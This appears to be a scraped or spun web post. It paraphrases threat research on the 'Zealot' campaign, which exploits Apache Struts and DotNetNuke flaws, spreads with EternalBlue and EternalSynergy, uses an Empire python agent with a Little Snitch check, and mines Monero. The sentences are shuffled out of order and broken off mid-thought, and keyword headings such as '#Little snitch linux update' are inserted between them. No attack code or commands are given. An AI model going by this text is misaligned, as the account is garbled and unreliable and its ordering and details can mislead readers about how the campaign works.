When sending the request to the C&C, specific User-Agent and Cookie headers are added. The way this script communicates with the server is levels of sophistication beyond the common botnet herder, so it grabbed our attention. Currently the campaign delivers crypto-miner MZ for Windows and ELF for Linux. The Little Snitch check is part of this python agent. The attackers seem to be using the EmpireProject post-exploitation framework (see section below) which generates a python agent for both Linux and OS X. It doesn’t appear that the attackers are targeting MACs currently.
#Little snitch linux code
If the firewall process is not running, it will send a request to a C&C server to fetch another piece of python code.Īt the time we conducted this research, we could not collect that additional python code as the server was down.
While most of the similar Apache Struts campaigns target either Windows or Linux platforms, Zealot is equipped with payloads for both. One of the requests is the notorious Apache Struts exploit via the Content-Type header. The attack starts with the threat actor scanning the web and sending two HTTP requests.
Targeting Apache Struts Jakarta Multipart Parser (CVE-2017-5638) The Zealot campaign is currently mining the cryptocurrency Monero, however, attackers could use compromised systems to do whatever they want. The Zealot campaign aggressively targets both Windows and Linux systems with the DNN and Struts exploits together. When looking more closely at the unusually high obfuscated payload, we discovered a much more sophisticated multi-staged attack, with lateral movement capabilities, leveraging the leaked NSA-attributed EternalBlue and EternalSynergy exploits. It also exploits the DotNetNuke (DNN) vulnerability (CVE-2017-9822 2 ), disclosed in July 2017. When F5’s threat researchers first discovered this new Apache Struts campaign dubbed Zealot, it appeared to be one of the many campaigns already exploiting servers vulnerable to the Jakarta Multipart Parser attack (CVE-2017-5638 1 ) that have been widespread since first discovered in March 2017.
Zealot collectively exploits servers vulnerable to:.
Zealot is a sophisticated, highly obfuscated and multi-staged attack.New Apache Struts campaign, Zealot, targets Windows and Linux systems.
#Little snitch linux update
As we continue to research this campaign, we will update this publication.
#Little snitch linux zip file
We have dubbed the campaign “Zealot” based on the name of the zip file containing the python scripts with the NSA-attributed exploits. This new campaign is a sophisticated multi-staged attack targeting internal networks with the NSA-attributed EternalBlue and EternalSynergy exploits. F5 threat researchers have discovered a new Apache Struts campaign.
0 kommentar(er)
